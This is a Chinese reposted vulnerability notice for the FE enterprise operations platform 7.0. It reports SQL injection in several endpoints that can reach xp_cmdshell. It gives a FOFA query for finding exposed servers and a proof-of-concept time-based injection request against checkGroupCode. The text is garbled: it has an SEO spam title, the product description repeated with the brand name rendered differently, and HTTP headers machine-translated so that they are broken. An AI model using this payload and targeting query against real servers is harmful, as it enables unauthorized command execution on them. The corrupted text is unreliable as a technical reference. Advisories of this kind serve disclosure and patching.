飞企互联,飞企互联倒闭了吗知乎

飞企互联0x01 产品简介
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转

0x01 产品简介

飞骑互联网-FE企业运营管理平台是基于云计算、智能化、大数据、物联网、移动互联网等技术支持的云工作台。平台连接人、链接、内外部连接,支撑B2B、C2B、O2O等企业核心需求,支撑跨行业客户的互联网+转型。其特点是提供集人工智能、大数据分析、物联网设备管理为一体的云工作环境,全面支撑不同行业客户的互联网+转型。通过智能决策支持和数据驱动的业务优化,企业可以更加灵活高效地运营业务,实现数字化转型的战略目标。

0x02 漏洞概述

飞旗互联网-FE企业运营管理平台checkGroupCode、efficientCodewidget39、ajax_codewidget39等接口存在SQL注入漏洞,未经授权的攻击者可利用这些漏洞操纵数据库xp_cmdshell,执行任意命令,从而具有运行和控制服务器的可能。经分析判断,该漏洞利用难度较大,建议您尽快修复。

0x03影响范围

7.0版本

0x04复现环境

FOFA: app=\’FE-协作平台\’

0x05漏洞复现

概念验证-1

GET /docexchangeManage/checkGroupCode.js%70?code=1\’;waitfor+delay+\’0:0:5\’– HTTP/1.1

Host:你的IP

Accept: 应用程序/json,文本/javascript,*/*

用户代理: Mozilla/

#飞骑以上有关互联网相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92754.html

(0)
CSDN的头像CSDN
上一篇 2024年6月28日
下一篇 2024年6月28日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注